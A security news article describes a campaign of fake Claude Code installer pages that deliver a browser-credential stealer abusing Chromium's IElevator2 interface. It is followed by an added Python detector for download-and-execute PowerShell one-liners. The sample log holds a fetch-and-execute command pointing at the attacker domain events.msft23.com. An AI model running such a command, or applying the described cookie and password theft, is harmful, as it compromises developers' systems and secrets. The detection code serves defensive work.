Fake Claude Code Installers Used to Exfiltrate Developer Secrets via IElevator2 Abuse
A new, sophisticated malware campaign is targeting developers by using malicious search advertisements and dynamic HTML rendering to steal sensitive browser data, including cookies and passwords, from Chromium-based browsers.

A sophisticated malware campaign is targeting software developers by masquerading as legitimate installation instructions for popular coding tools, most notably Anthropic’s Claude Code. Security researchers at Ontinue discovered that attackers are leveraging malicious search engine advertisements to lure developers to lookalike websites. Once on these sites, users are prompted to execute a PowerShell command that appears to be a standard one-line installer, such as `irm https://claude.ai/install.ps1 | iex`, but is actually modified to point to an attacker-controlled domain, events.msft23.com (The Register).
The attack mechanism is designed to bypass automated security scanners and URL reputation services. The malicious command is rendered dynamically within the HTML of the landing page, meaning that automated tools or researchers simply "curling" the URL will only see legitimate, clean PowerShell code. Only the victim, interacting with the page in a browser, is presented with the malicious instruction. This command triggers an obfuscated PowerShell loader that injects a custom-built native helper into a running browser process (The Register).
The primary objective of this malware is to exfiltrate sensitive data, including decrypted cookies, saved passwords, and payment information, from Chromium-based browsers like Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. To achieve this, the malware specifically targets the IElevator2 COM interface, which Google introduced in January to protect browser data via App-Bound Encryption (ABE). By injecting a helper module, the malware invokes this interface to recover the ABE key, effectively decrypting the browser's local databases (The Register).
If the IElevator2 interface is unavailable or restricted, the malware is programmed to fall back to legacy elevation services. Once the ABE key is successfully recovered, the PowerShell loader decrypts the browser’s sensitive data and packages it into an in-memory secure_prefs.zip archive. This archive is then exfiltrated to an attacker-controlled server. Ontinue researchers noted that the malware communicates using Chromium’s legitimate Mojo naming convention for inter-process communication (IPC) pipes to evade detection (The Register).
The campaign relies on three domains registered in April, all protected by Cloudflare and utilizing valid Let’s Encrypt certificates to appear trustworthy. While the malware shares some functional similarities with existing stealers like Glove Stealer—specifically regarding the abuse of IElevator via a named pipe—researchers confirmed that this payload does not match any previously documented malware family. The researchers compared the code against numerous known stealers, including Lumma, StealC, Vidar, and Metastealer, finding no direct technical match (The Register).
This campaign highlights a growing trend of attackers focusing on the developer ecosystem by exploiting trust in legitimate installation workflows. By abusing security features like App-Bound Encryption, these actors demonstrate an evolving capability to bypass modern browser protections. Developers are advised to exercise extreme caution when executing installation commands from search results and to verify the source of any scripts before running them in their local environments (The Register).
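The lure described above is a one-line "download and execute" command whose only visible difference from the genuine installer is the host it fetches from, and the closing advice is to verify that host before running anything. The following Python is an added example (not code from the article, from Ontinue, or from The Register) of the check a defender can apply to a command before running it, or to PowerShell script-block log lines after the fact: it parses `irm`/`iwr`/`Invoke-RestMethod`/`Invoke-WebRequest` piped into `iex`/`Invoke-Expression`, extracts the host, and flags anything not on an allowlist, with a separate "lookalike" verdict for hosts that borrow a brand token. The allowlist (`claude.ai`), the brand-token list, and the sample log lines are constructed for the example; `events.msft23.com` is the domain named in the article.

```python
import re
from urllib.parse import urlparse

# Hosts from which the installers we expect developers to run are legitimately served.
# Constructed allowlist for this example: claude.ai is the legitimate host named in the article.
ALLOWED_INSTALLER_HOSTS = {"claude.ai"}

# Brand tokens used to label an unknown host as a probable lookalike (constructed list;
# "msft" covers the events.msft23.com domain named in the article).
BRAND_TOKENS = ("claude", "anthropic", "msft", "microsoft")

# Matches "<download cmdlet or alias> <url> ... | <execute cmdlet or alias>", i.e.
# download-and-execute one-liners such as `irm https://claude.ai/install.ps1 | iex`.
DOWNLOAD_AND_EXEC = re.compile(
    r"(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\s+(?:-Uri\s+)?"
    r"['\"]?(?P<url>https?://[^\s'\"|]+)['\"]?"
    r"[^|]*\|\s*(?:iex|Invoke-Expression)\b",
    re.IGNORECASE,
)


def extract_install_url(command: str):
    """Return the URL of a download-and-execute one-liner, or None if the command is not one."""
    m = DOWNLOAD_AND_EXEC.search(command)
    return m.group("url") if m else None


def classify_host(host: str) -> str:
    """Classify the host that a piped installer script is fetched from."""
    host = host.lower()
    if host in ALLOWED_INSTALLER_HOSTS:
        return "allowed"
    if any(token in host for token in BRAND_TOKENS):
        return "lookalike"   # borrows a brand name but is not the allowlisted host
    return "unknown"


def analyze_command(command: str) -> dict:
    """Decide whether a single command pipes a remote script into the interpreter, and from where."""
    url = extract_install_url(command)
    if url is None:
        return {"piped_installer": False, "host": None, "verdict": "not-a-piped-installer"}
    host = urlparse(url).hostname or ""
    return {"piped_installer": True, "host": host, "verdict": classify_host(host)}


def scan_log_lines(lines):
    """Return (index, host, verdict) for every line that pipes a download into the
    interpreter from a host that is not on the allowlist."""
    findings = []
    for i, line in enumerate(lines):
        result = analyze_command(line)
        if result["piped_installer"] and result["verdict"] != "allowed":
            findings.append((i, result["host"], result["verdict"]))
    return findings


# Constructed sample command lines, in the shape they would have in PowerShell script-block logs.
SAMPLE_LOG = [
    "irm https://claude.ai/install.ps1 | iex",
    "irm https://events.msft23.com/install.ps1 | iex",
    "Invoke-WebRequest -Uri 'https://cdn.example.invalid/setup.ps1' -UseBasicParsing | Invoke-Expression",
    "Get-ChildItem C:\\Users | Measure-Object",
]

if __name__ == "__main__":
    for idx, host, verdict in scan_log_lines(SAMPLE_LOG):
        print(f"line {idx}: {verdict:9s} host={host}  cmd={SAMPLE_LOG[idx]}")
```

Running the block reports the `events.msft23.com` line as a lookalike and the `cdn.example.invalid` line as unknown, while the genuine `claude.ai` installer and the unrelated pipeline are left alone. Because the article notes that the malicious command only appears when the page is rendered in a browser, the check is most useful applied to what the developer is actually about to paste (or to script-block logs of what was pasted), not to a `curl` of the landing page.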